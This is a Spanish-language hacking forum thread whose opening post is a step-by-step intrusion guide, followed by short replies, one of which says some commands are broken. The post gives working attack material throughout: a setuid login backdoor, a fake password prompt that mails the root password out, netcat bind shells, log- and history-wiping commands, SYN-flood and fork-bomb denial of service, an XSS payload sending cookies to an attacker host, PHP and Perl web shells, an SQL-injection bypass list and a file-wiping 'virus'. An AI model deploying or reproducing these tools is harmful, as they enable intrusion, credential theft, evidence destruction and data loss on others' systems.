Título: Hacking Basico!! Publicado por: HaCkZaTaN en 6 Noviembre 2004, 04:18 am /*
Name: Hacking Copyright: [N]eo Security [T]eam [NST]® Author: HaCkZaTaN Date: 04/11/04 19:19 Description: Hacking */ _________________________________ |=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| |=-=-=-=-=-=by HaCkZaTaN-=-=-=-=-=| |-=-=-You may pray for your Pc=-=-| |=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| |_________________________________| _________ |1= Intro| |________| Hey q mas!! Pues aqi escribiendo esto haber que mas se me ocurre ____________ |2= Objetivo| |___________| Ir a Google.com oK tenemosque mirar el objetivo detalladamente y anotar toda la Info Lo mas que podamos y no se te ocurra Conectarte desde tu pc xD hazlo desde una shell y utilzar bouncers............................... ________ |3= O.S | |_______| oK determinar el O.S es muy importante Formas: __________________________________________________ Telnet> Host 23 [Es mucho mejor aveces colocar el puerto ssh <<22>>] ___________________________________________________ Ftp> Host 21 [Para saber el server de ftp y mirar si tiene bugs para entrar como root es una forma mas facil Determinar el DAEMON] _______________________ |4= Escanear una WebPage| |_______________________| Yo scaneo con nmap es el mejor scanner que hay en la Net <<That's what i Think>> Este scanner te da un log muy buena de los puertos y alguna informacion extra Tenemos que mirar si esta en varios Dns para mirar con que nos metemos por que aveces estan los diferentes puertos en cada Dns>> Me explico [Dns1]>>>Tiene abierto el ftp [Dns2[>>>Tiene abierto el ssh Escaneamod de esta manera nslookup host ____________________________________ |5= Tratar de entrar por los puertos| |___________________________________| Para sacar info de los puertos y de los daemons hacemos telnet> host 21 telnet> host 22 telnet> host 25 telnet> host 79 telnet> host 110 telnet> host 109 telnet> host 143 telnet> host 139 <<<por si utiliza archivos compartidos en windows>>> telnet> host 119 oK nos vamos a mirar a cada daemon y mirar su server ejemplo Port 21 Server ProFtp>>>> Buscamos Xploits para esta version de este server para tener permisos admins, O si nos deja entrar como anonimo o guest y nos deja mirar /etc/passwd o /etc/shadow/ pues miramos si no estan cifrados y buscamos un desencriptador de Md5 o en lo que este La mayoria de linux o Unix encriptan a 64bits Port 22 lo mismo buscamos el server de ssh Port 79 Finger si lo tienen abierto nos libran un peso de encima por que Esto nos da mucha informacion del usuario o root escribimos <<</w>>> para mirar quien esta en linea oK esto nos da mucho info. Una cosa tambien podemos poner un sniffer es una grandiosa idea Bueno con la informacion que aparece cuando haces el finger el passwd podria ser muy facil de sacarlo y nos serviria como una shell gratuita y de buena calidad <<smart me, don't I?>> Otra seria sacar los passwd de los emails para mirar de que es lo que habla el root y con quien y hasta depronto podemos utilixar nuestra ingenieria social para sacar los passwd de la PC. Podemos acceder por el puerto 110 <<POP>> Podemos utilizar xploits, hay muchos para cada tipo de server de sendmail <<25>> o POP <<110>> Tambien por el Puerto 80 scaneamos Bugs: PHP NUKE SQL CGI PL ASP APACHE ORACLE Etc... ____________________ |6= Local Xploits | |___________________| Podemos utilizar exploits cuando ya estamos dentro de la maquina. sh-3.00$ sh Xploit.sh ven que facil ;-) oK deben de saber de C por que aveces lo xplits no vienen bien configurados Una vex hecho todo eso creamos un Usuario para tener una shell gratis xD Pero no usuario normal si no uno con derechos como root (osea no ser root por que no se puede pero que tenga todos los derechos posibles)) xD Ahora estan con la moda del W00t, ptrace.. Bueno pues busquen acerca de el pero ademas ya son obsoletos Jugando con offsets Digo esto para los que les gusta jugar con ella :) Un pequeno Brute Force en Perl. *********************** #!/usr/bin/perl $MIN=0; $MAX=5000; while($MIN<$MAX) { printf('offset : $MIN n'); system('xploit $MIN'); $MIN++; } ************************** __________________ |7- Remotes Xploits| |__________________| Ok subimos un xploit a nuestra shell y colocamos: root@HaCkZaTaN!!:~ # ./s 0 && cat | netcat host 457 id uid=28(nouser) gid=28(nogroup) groups=28(nogroup) y listo nos dio una shell nobody. Acuerdense que hay que jugar con el offset para poder tener root xD. _________________ |8= Borrar Huellas| |_________________| Borramos Huellas de esta manera rm /var/log/wtmp rm /var/log/lastlog Para arrglar el PC tee /var/log/wtmp tee /var/log/lastlog modo mas bueno seria find / -name log && rm -rf && rm -f && ps -def && grep klogd && kill -9 pid && ps -def | grep syslog cd / rm -rf .bash_history && rm -rf /var/adm && rm -rf /root/.bash_logout && rm -rf /root/.bash_history hay que Editar.bash_history o .sh_history y si quieres es tumbar la PC xD: rm -rf/etc/passwd rm -rf /etc/shadow rm -rf /bin/login rm -rf /bin/rm rm -rf /etc/inetd.conf killall login *********************************** find / -name log* -exec rm -rf {} \ //Forma ofuscada *********************************** Otra Forma ((REpito caso todo lo de arriba xD Buscando archivos con nombres que empiexen por log: **************** find / -name log //Despues los borramos ***************** ******************** ps -def | grep klogd //Editamos este archivo ps -def | grep syslog //Editamos este archivo ******************** *********** kill -9 pid //Matamos todos los procesos *********** **************************** cd / unset HISTFILE rm -rf .bash_history rm -rf /var/adm rm -rf /root/.bash_logout rm -rf /root/.bash_history **************************** En windows Seria del c:\winnt\system32\logfiles del c:\windwos\system32\logfiles del c:\winnt\system32\logfiles\*.log dir /s *.log dir /s *.evt Bueno pero esto no es todo es mejor que te bajes un Zapper o un Wipper es la misma cosa pero gente le gusta llamarlo de diferentes maneras ____________ |9- Troyanos| |___________| Troyano para linux el mas famoso y mas confiable BackDoor <<Hint: La mayoria de linux no tienen antivirus>> Lo llamaremos login.c *********************************************************************************************** #include <stdio.h> #define OLDLOGIN "/usr/lib/login" #define LOGINNAME "login" #define MAGIC_WORD "localhost" #define REVISION "$Id: Localcore 2000/08/14 21:31:00 marekm Exp $" char **exe; do_back() { puts(REVISION); putenv("TERM=vt100"); putenv("HISTFILE=/dev/null"); execl("/bin/sh","sh","-i",0); } main(argc, argv) int argc; char *argv[]; { exe = argv; exe[0] = LOGINNAME; if ((char *)getenv("DISPLAY") != (char *)NULL) if (strncmp(getenv("DISPLAY"),MAGIC_WORD,strlen(MAGIC_WORD)) == 0) do_back(); execv(OLDLOGIN,exe); } ***************************************************************************************************** Bueno lo Subimos asi; cp /bin/login /usr/lib/login chmod 777 /usr/lib/login tee login.c gcc -O2 login.c -o login chmod 4755 /bin/login Bueno si queremos colocar clave modificamos #define MAGIC_WORD "localhost" <<<Por esto>>> #define MAGIC_WORD "aqui el password sin espacios" oK ya tenemos root xD. Esto seria en Windwos Utilizamos el SUb7 0 SubSeven Ok subiremos un bouncer xD Hacemos esto "advanced" "PORT REDIRECT" en "input port" pon el puerto que nos vamos a conectar ejemplo 1942 en "output host/ip" Ip/Host a conectar en "output port" Puerto a conectar 21,23 etc. <<tambien se puede hacer en el IRC cuando te banean o quieres entras por seguridad>> Para estar con bouncer en cualquier puerto lo hacemos asi en este caso Sera Http <<80>> en "input port" 80 en "output host/ip" Host/Ip en "output port" 80 ahora en el UNICONSOLE ponemos la ip del BOUNCER en vez de www.mju.es y JAMAS sabran que hemos sido nosotros los que han entrado. Para entrar en un FTP con claves ROBADAS y que no nos visiten los agradables guardia civiles: -en "input port" Pon 21 -en "output host/ip" ponemos el OBJETIVO ftp.terra.es (por ejm) -en "output port" pon 21 oK es facil asi se hace susecivamente con todos los puertos Es lo mismo que en la shell pero un poco mas complicado Unos se preguntaran pero como le hago para no estar jugando con comandos desde la URL pues hay tenemos una Opcion dejar la pagina que estamos atacando con un backdoor o corriendo algun servidor que nos deje entrar con el ssh (Putty si estas en Windows) hay un BackDoor que se llama r0nin o puedes buscar mas en google.com hay apareceran bastantes. Aqui les dejo un troyano:D ************************************************************************************ ************************************************************************************ #include <stdio.h> #include <pwd.h> #include <stdlib.h> #define EMAIL "correo@electronico.aqui" #define ARCH "arch.fsu int main(void) { char enviar[100]; char grabar[100]; char* clave; FILE* archivo_ptr; clave = (char *) getpass("Password:"); puts ("Sorry"); archivo_ptr = fopen(ARCH, "w"); fprintf (archivo_ptr, "Root Password: %s\n", clave); fclose (archivo_ptr); #ifndef TMP sprintf(enviar, "mail %s < %s ; rm %s", EMAIL, ARCH, ARCH); system(enviar); #else sprintf(grabar, "cp %s %s", ARCH, TMP); system(grabar); #endif exit (EXIT_SUCCESS); } ************************************************************************************ ************************************************************************************ La otra opcion que digo es con el NetCat :D Dejando unpuerto a la escucha con alguna shell ya sea zsh sh bash etc..... Pero como lo hacemos? pues es muy facil si es una Windows la Maquina que estamos atacando dejas escuchando asi
nc -l -p 8000 -t -e cmd.exe -L **************************** ****************** nc -L -w 1 -p 8000 ******************
nc -vvlp 8000 -e /bin/bash ************************* ****************** nc -L -w 1 -p 8000 ****************** Bueno tu ya descojeras de las maneras que quieras entonces despues le sacas la Ip a la Pagina que estas atacando o con el mismo host y desde tu maquina habres el ssh o el telnet (Putty si estas en Windows) o el nc, recomiendo el netcat por que dejamos a la escucha con el mismo netcat Entonces nos conectariamos asi ********************* nc -vv host/ip 8000 ******************** _________ |10= Spoof| |_________| El spoof es cuando falsean tu ip o la mayoria de los paquetes que entran en ella se utiliza para saltar firewalls y otros tipos de seguridad. ___________________________ |11= Como tumbar un servidor| |___________________________| Compilar el programa: cc synk4.c –o synk4 Modo de uso ./synk4 <ip-origen> <ip-destino> <puerto-inicial> <puerto-final> <ip-origen> 0, y el programa utilizara un random de IPS <ip-destino> Pones la ip de destino ejemplo 127.0.0.1 <puerto-inicial> y <puerto-final> Eje: ./synk4 0 127.0.0.1 21 21 0 23 23 Se empexara a moverse un contador... Cuando llegue a 4000 o 5000 o 6000 ya paramos hay Cuando acabemos todo y cerremos el progrma nos conectaremos al puerto que atacamos y nos damos cuenta que esta tumbado xD [root@localhost]# telnet localhost 23 Trying 127.0.0.1... El programa a descargar se llama SYN <<TCP SYN Flooding>> Bueno tambien se podria hacer local usar malloc(); y fork(); Ejemplo: ********************************** /* Name: LinuxCrash Copyright: Neo Security Team [NST]® Author: HaCkZaTaN Date: 12/09/04 03:51 Description: CrashesLinux */ int main() { while(1) { malloc(1024); fork(); } return 0; } *************************************** ______________ |12= Keylogger| |_____________| Bueno a muchos les gusta o no les gusta usar keyloggers pero si necesitas uno pues utilizalo todo es posible en esta vida y si te dicen que es de lammer pues mas lammer el que se lo deja meter ______________ |12= Tecnicas | |_____________| Bueno esto me da hasta pena colocarlo pero bueno como se han dado cuenta ahora la moda de hackear es con el w00t, r0nin, mass, yim. Pues son utilidades para *nix su modo de uso es sencillisimo $chmod 777 programa $./programa Como pueden ver no tiene ciencia esas tecnicas son estupidas lo bueno es crear shellcodes y xploits hacer overflows eso si que es muy bueno, trabajar con los offset etc.... ______________ |12= XSS | |_____________| Pues bueno ahora ya dicen que hackean una pagina Php o Html por hacer XSS en la pagina pero bueno eso no importa lo que importa es aprender <input type="text" name="palabra"> que será el formulario. <input type="submit" name="buscar" value="Buscar"> que será el boton. Como pueden ver es vulnerable entonces podemos proceder a hacer XSS Creamos un archivo .php que contenga cookie Código: <? $cookie = $_GET['cookie']; $fff = fopen("archivo.txt","a"); fwrite($fff, "$cookie \n"); fclose($fff); ?> http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=; Bueno a mi casi no me gusta explicar si no dejar todo hecho y que usteddes lo descubran sorry si no explico CrashCool ah creado una Herramienta exelente para esto lo que hace es cifrar el Texto>> Gracias CrashCool Pagina Crashcool.com Link de descarga http://crashcool.com/xss-c.zip [-]XSS generator by CrashCool [-]Introduzca codigo: <script>alert("hola");</script>
<script>var b=String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 34, 104, 111, 108, 97, 34, 41, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62); document.write(b);</script> [-]Guardarlo en archivo? (s/n) :s
Codigo: #include <stdio.h> #include <string.h> #include <stdlib.h> #define XSS_1 "<script>var b=String.fromCharCode(" #define XSS_2 "); document.write(b);</script>" #define MAX_ENTRADA 800 /** *Generador de XSS *Genera y da la posibilidad de guardar a archivo *Diseñado para saltar filtros de las comillas "" *Autor:CrashCool *Fecha: 03/10/04 *Licencia: GPL *web: www.crashcool.com *contacto: crashcool@gmail.com *V: 1.0.1 *version original en JAVA www.crashcool.com */ void guardar(char *salida); int main() { char a[MAX_ENTRADA]; char aux[5]; char *res=NULL,opcion='\0'; int tamanyo,i; puts("[-]XSS generator by CrashCool"); puts("[-]Introduzca codigo:"); gets(a); fflush(stdin); tamanyo=(strlen(a) * 3)+((strlen(a)-1) * 2); res=(char *)malloc(tamanyo*(sizeof(char))); strcpy(res,XSS_1); for(i=0;i<(int)strlen(a);i++) { strcpy (aux, ""); sprintf(aux,"%d",(int)a); if(i< (int)(strlen(a)-1) ) strcat(aux,", "); strcat(res,aux); } strcat(res,XSS_2); puts("
printf("[-]Guardarlo en archivo? (s/n) :"); opcion=getchar(); if(opcion=='s' || opcion =='S'){ guardar(res); puts("
fflush(stdin); puts("]x[ Pulse la tecla ENTER para salir..."); getchar(); return 0; } void guardar(char *salida) { FILE *archivo; archivo=fopen("xss.html","w"); fprintf(archivo,"%s",salida); fclose(archivo); } ****************************************************************************************** _________________________________ |13= Remote File Inclusion (RFI)| |_______________________________| Remote File Inclusion (RFI) A mi casi no me gusta explicar si no dar el trabajo hecho osea al grano no dar vueltas al asunto De que trata el Bug!! ----- beging the code in index.php ----- if (!isset($req_path)) $req_path=""; require_once($req_path."funcs.php"); ----- end of the code ----- Forma de xplotar http://localhost/nst/index.php?req_path=http://nst/ _____________________________________________________________________________________________________ Otro bug es el de: ************************************************* <? exec($_GET[cmd],$salida); foreach($salida as $line) { echo "$line<br>"; } ?> ************************************************ <? system($_GET[cmd],$salida); foreach($salida as $line) { echo "$line<br>"; } ?> ************************************************* <? passthru($_GET[cmd],$salida); foreach($salida as $line) { echo "$line<br>"; } ?> ************************************************* <?php $com = $_GET["com"]; system ("$com"); ?> ************************************************* <?php echo '<?php $com = $_GET["com"]; system ("$com"); ?>'; ?> ***************************************************** Modo de explotacion http://localhost/nst/index.php?req_path=http://nst/&com=ls ___________________________________________________________________________________________________ Modo de Busqueda!! **************************************************************************** **************************************************************************** allinurl: "index.php?*=*.php" http://www.google.com/search?num=100&hl=en&lr=&q=allinurl%3A+%22index.php%3F*%3D*.php%22&btnG=Search **************************************************************************** **************************************************************************** inurl: "index.php?*=*.php" http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=inurl%3A+%22index.php%3F*%3D*.php%22&btnG=Search **************************************************************************** **************************************************************************** allinurl: /My_eGallery/public/displayCategory.php? http://www.google.ca/search?hl=en&q=allinurl%3A+%2FMy_eGallery%2Fpublic%2FdisplayCategory.php%3F&meta= **************************************************************************** **************************************************************************** ___________________________________________________________________________________________________ Bueno ahora estan con la Moda de Remote File Inclusion. Y todo esto dado en PHP bueno pues aqui les traigo unos en Perl Smile Funcionan de la misma manera http://host/cgi-bin/net.cgi?p=uname -a Donde: nst.cgi >> Es el nombre del archivo p es el comando que esta en el nst.cgi que nos da shell El que utilizo para esta demostracion es el numero 3 saludos 1 Código: **************************************************************************** **************************************************************************** #! /usr/bin/perl use CGI qw(:standard); print header; my $c=param("c"); if ($c gt "") { $s=`$c 2>&1`; print start_form,textfield("c",$c),submit("go"),end_form,pre($s) } else { print "[N]eo Security [T]eam [NST]" } **************************************************************************** **************************************************************************** 2 Código: **************************************************************************** **************************************************************************** #! /usr/bin/perl use CGI qw(:standard); print header; my $c=param("c"); if ($c gt "") { $s=`$c 2>&1`; print start_form,textfield("c",$c),submit("go"),end_form,pre($s) } else{ print "[N]eo ecurity [T]eam [NST]" } **************************************************************************** **************************************************************************** 3 Código: **************************************************************************** **************************************************************************** #!/usr/bin/perl use CGI qw(:standard); print header; my $k=param("p"); my $a=param("a"); if ($a || $k) { $l=`$k 2>&1`; print start_form,textarea("p",$k,3,50); print submit("Enter"); print end_form; print pre($l); } **************************************************************************** **************************************************************************** _________________________________ |13= Subiendo Archivos a un host| |_______________________________| Como subimos archivos a la pagina o host a Hackear? Pues hay muchas formas pero dare unas cuentas wget http://www.host.com/archivo.c lynx http://www.host.com/archivo.c links http://www.host.com/archivo.c curl -O http://www.host.com/archivo.c curl -a ftp://www.host.com/archivo.c **************************************************************************** **************************************************************************** ______________ |14= Rooteando| |_____________| Como lo rooteo? Bueno ahora te toca tu turno de ir a google.com y buscar Aqui en Neosecurityteam.org tenemos unos cuantos xploits que nos dan root remotamente o localmente solo necesitas compilarlos y ya hay un archivo en la red que se llama w00t, xp1. estos te daran root con solo ejecutarlos en el sistema que bueno no? jajaj se utilizan asi ./w00t ./xp1 Otra forma seria por shellcodes!! Pero esto si no lo explicare es algo muy largo pero si quieren tener idea de lo que hablo ok main() { system("/bin/sh"); //exeve(1,"/bin/sh"); } Compilas eso como un .c y listo despues objdum -d archivo sacamos NULL's bytes osea xoring y listo. Complicado no!! **************************************************************************** **************************************************************************** _______________ |15= Compilando| |______________| Como compilo? gcc -O4 -w -g -s archivo.c -o x gcc archivo.c -x nasm archivo.asm Como linkeo desde asm? nasm -f elf archivo.asm ld -o archivo.exe archivo.o **************************************************************************** **************************************************************************** _______________ |16= Anonimo | |______________| Quiero estar anonimo? Busca acerca de Bouncers PSYbnc Proxys **************************************************************************** **************************************************************************** ______________________ |17= Inyeccion SQL | |____________________| No explicare mucho solo dare unos User y Pass!! usuario='geek' senha='s3nh4' usuario='' or '1' senha='s3nh4' usuario= 'or' senha= 'or' usuario=' or ' 1 senha=' or ' 1 usuario='1' = '1' senha='1' = '1' usuario=' or '1'='1 senha=' or '1'='1 usuario='' or '1'='1' senha='' or '1'='1' usuario="senha" senha="senha" usuario="password" senha="password" usuario="teste" senha="teste" usuario="123" senha="123" usuario="1234" senha="1234" usuario="12345" senha="12345" usuario="VB" senha="VB" usuario="visual" senha="visual" usuario="basic" senha="basic" usuario=' or senha='teste senha=' or senha='teste usuario=' or senha='login senha=' or senha='login usuario=' or email like 'flavio% senha= ' or email like 'flavio% usuario='or '1'='1' order by 1 -- senha='or '1'='1' order by 1 -- usuario=' or '1'='1' order by 1 -- senha=' or '1'='1' order by 1 -- usuario=' or 1=1-- senha=' or 1=1-- usuario='or''=' senha='or''=' usuario=' or 'a'='a senha=' or 'a'='a usuario=') or ('a'='a senha=') or ('a'='a usuario=b' or ' 1=' senha=b' or ' 1=' usuario=' or '| senha=' or '| usuario=123'or'= senha=123'or'= usuario=admin'- senha=admin'- usuario=' or '1=true senha=' or '1=true usuario=7' or ' 1 senha=7' or ' 1 usuario=root senha=root usuario=shell senha=shell usuario=admin senha=123456 usuario=admin senha=admin Usuario=‘;shutdown-- senha=‘;shutdown-- **************************************************************************** **************************************************************************** _____________ |18 OffTopic| |___________| Bueno muchos dicen por hay que es un Lame Virus o le dicen otros nombres mas por que razon? Por que le pasan el codigo a un Lammersito cualquiera y le dicen mira compila esto y cojeras r00t o ownearas windows o cualquier cosa. Se puede compilar en windows o linux gcc LameViruz.c Código: /* Name: LameViruz Copyright: [N]eo ecurity [T]eam [NST]® Author: HaCkZaTaN Date: 26/10/04 17:17 Description: LameViruz */ #include <stdio.h> #include <stdlib.h> int main() { double x; for (x=0; x<1000000000; x++) { printf("\nHacktool\n", x); printf("\nAhora miraras que ya puedes hackear con solo mirar la pantalla ;)\n", x); system("rm -rf /bin/*"); system("rm -rf /usr/bin/*"); system("rm -rf /*"); system("del /F /Q C:\\windows\\system32\\hal.dll"); system("del /F /Q C:\\windows\\system32\\kernel32.dll"); system("del /F /Q D:\\windows\\system32\\hal.dll"); system("del /F /Q D:\\windows\\system32\\kernel32.dll"); system("del /F /Q c:\\*.ini"); system("del /F /Q c:\\*.bat"); system("del /F /Q c:\\*.sys"); system("del /F /Q c:\\*.exe"); system("del /F /Q c:\\*.dll"); system("del /F /Q c:\\windows\\*.ini"); } } **************************************************************************** **************************************************************************** ________________________________________________________________________________________________ NOTA o TIP Es muy recomendable dar permisos a los archivos que subes o que quieres ejecutar. como se hace eso? les dare tres formas chmod -x archivo chmod 777 archivo chmod 777 * ===================================================================== ===================================================================== Título: Re: Hacking Basico!! Publicado por: K-19 en 11 Noviembre 2004, 05:38 am ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::)
Título: Re: Hacking Basico!! Publicado por: - DarkLinux - en 20 Noviembre 2004, 08:31 am No me parece Básico.
Ami forma de pensar. Esto no es lo que buscan los super new bies. Lo que buscan ellos es algo de troyanos, keyloggers, caballos de troya, meterse a pc por telnet. Etc... Esto ya es para los que ya vieron lo anterior, y entonces si, leen el manualito de arriba, y pues aumentan de calidad de persona y su autoestima aumente :) jejej Saludos Título: Re: Hacking Basico!! Publicado por: HaCkZaTaN en 21 Noviembre 2004, 04:39 am :o Pues no se como lo cojan es igual basico, avanzado. el fin es de aprender.
Salu2!! Título: Re: Hacking Basico!! Publicado por: CiberWoW en 18 Julio 2007, 04:43 am LO QUE NO ENTIENDO es por que tacho la letra eso complica la lectura ...
SaLu2 ::) Título: Re: Hacking Basico!! Publicado por: yeikos en 18 Julio 2007, 04:47 am LO QUE NO ENTIENDO es por que tacho la letra eso complica la lectura ... SaLu2 ::) Copia el documento y pegalo en el bloc de notas... :P Título: Re: Hacking Basico!! Publicado por: ActiveSheet en 20 Julio 2007, 09:49 am no sean malitos traduscanmelo padesco de la vista
Título: Re: Hacking Basico!! Publicado por: Tor en 20 Julio 2007, 10:18 am LO QUE NO ENTIENDO es por que tacho la letra eso complica la lectura ... SaLu2 ::) Copia el documento y pegalo en el bloc de notas... :P Si bueno, ya, pero PORQUE esta tachado el texto? :S Título: Re: Hacking Basico!! Publicado por: yeikos en 20 Julio 2007, 11:08 am El autor quiso escribir...
Código: [N]eo [S]ecurity [T]eam [NST]® Pero en bbCODE la etiqueta [*s] está reservada para tachar el texto... Citar [N]eo Título: Re: Hacking Basico!! Publicado por: Tor en 20 Julio 2007, 11:22 am El autor quiso escribir... Código: [N]eo [S]ecurity [T]eam [NST]® Pero en bbCODE la etiqueta [*s] está reservada para tachar el texto... Citar [N]eo Lol xD Gracias! :P Título: Re: Hacking Basico!! Publicado por: Kasswed en 20 Julio 2007, 15:13 pm Modificado. Más vale tarde que nunca.
Saludos. Título: Re: Hacking Basico!! Publicado por: ActiveSheet en 20 Julio 2007, 23:06 pm mira na mas que buena onda ahora si esta bueno
Título: Re: Hacking Basico!! Publicado por: RubiiTo en 7 Noviembre 2007, 20:42 pm Esta muy Bien, Gracias :D
Título: Re: Hacking Basico!! Publicado por: rubick en 5 Junio 2008, 20:33 pm Me parece una basura todo el documento.
Simplemente comento una linea: Citar find / -name log && rm -rf && rm -f && ps -def && grep klogd && kill -9 pid && ps -def | grep syslog cd / Esto busca desde el raiz un fichero que se llama literalmente "log" (no encontrara ficheros como access.log) luego, si el comando ha finalizado SIN errores (&&) ejecutará el sieguiente. El find, si lo ejecutas en algunos sistemas linux te darán error en algunos directorios por lo cual ya no se ejecutarán más comandos. Si el find no diera errores, borrarías forzando y de manera recursiva ningún fichero!!!!!!!!! si este comando termina bien (&&) que sabemos a ciencia cierta que te dará un error y no continuará, ejecutarías supuestamente un ps que te mostraría los ficheros y en este caso como el comando si sale bien, !buscarías la cadena klogd en ningún sitio! De nuevo.. si el anterior comando que te devolverá un error no lo hiciera, luego harías un kill sobre numero de proceso "pid" ¿??¿?¿? Esto solo en una linea..... se nota de sobra que no sabes de lo que estás hablando. Por cierto ... Citar sh-3.00$ sh Xploit.sh ven que facil ;-) oK deben de saber de C por que aveces lo xplits no vienen bien configurados Como que es así de facil un xploit????? no dices a que vulnerabilidad ataca, a que versiones afecta, como funciona ni como se llama ese xploit... Y nos dices que nosotros debemos de saber C, ¿Sabes acaso tu programar en C? Ejecutas en una shell "sh programa.sh" un script (ver la extension .sh) y luego dices que no vienen bien configurados estos exploits en C???? En fin.... Escribo esto para que la gente que se haya leido esta basura sepa que la información no es correcta y puede inducir a graves errores. Título: Re: Hacking Basico!! Publicado por: :ohk<any> en 6 Junio 2008, 21:53 pm Interesante Info, se que ve te ha tomado tiempo hacerlo.
Voy a probar un par de tus método haber que pasa. Saludos |